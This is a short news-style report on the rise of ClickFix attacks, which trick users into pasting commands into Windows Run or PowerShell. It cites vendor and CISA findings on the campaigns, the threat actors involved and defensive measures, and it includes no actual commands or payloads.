ClickFix attacks on the rise

ClickFix attacks have spread from a niche scam into a daily tactic, with Microsoft saying campaigns now hit thousands of devices worldwide each day. (microsoft.com) The trick is simple: a fake error, security warning, or CAPTCHA tells a user to copy a command, open Windows Run or PowerShell, paste it, and launch the attacker’s code by hand. Microsoft says some versions also preload the command into the clipboard before the victim pastes it. (microsoft.com) Proofpoint said on November 18, 2024 that it saw ClickFix move from early campaigns tied to TA571 and ClearFake into a much broader slice of the threat landscape. The company said the lures increasingly used fake fixes and fake verification steps to push victims into running PowerShell. (proofpoint.com) Security agencies now treat the method as part of mainstream intrusion playbooks. In a joint Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency advisory on Interlock ransomware, published in 2025, investigators said the group used ClickFix for initial access before moving to credential theft and lateral movement. (cisa.gov) The shift is away from breaking software and toward steering people. ReliaQuest said ClickFix accounted for the largest share of malware incidents it tracked from December 1, 2025 through February 28, 2026, in a period when attackers leaned on trusted tools, stolen identities, and user behavior. (reliaquest.com) That pattern has widened beyond cybercrime. Proofpoint said on April 17, 2025 that state-backed groups linked to North Korea, Iran, and Russia all tested ClickFix in campaigns observed from late 2024 into early 2025, using it to replace the installation step in existing attack chains. (proofpoint.com) The payloads vary, but the opening move stays the same. Microsoft said a March 13, 2025 phishing campaign impersonating Booking.com used ClickFix to deliver credential-stealing malware to hospitality targets across North America, Europe, Oceania, and parts of Asia. (microsoft.com) Researchers are also tracking new variants built on the same idea. Microsoft said on February 5, 2026 that a “CrashFix” campaign used a fake browser pop-up and abused the legitimate Windows tool finger.exe to help deliver a Python-based remote access trojan. (microsoft.com) Cybersecurity and Infrastructure Security Agency guidance now maps the behavior as “malicious copy and paste,” a user-execution technique in which a victim is talked into running the code for the attacker. That is why the defense advice centers on blocking risky script interpreters, limiting what users can run, and training people not to paste commands from pop-ups into Windows tools. (cisa.gov) ClickFix keeps working because it turns an ordinary habit into the breach point: the victim clicks, pastes, and launches the command themselves. Microsoft’s warning was blunt in August 2025: think before you ClickFix. (microsoft.com)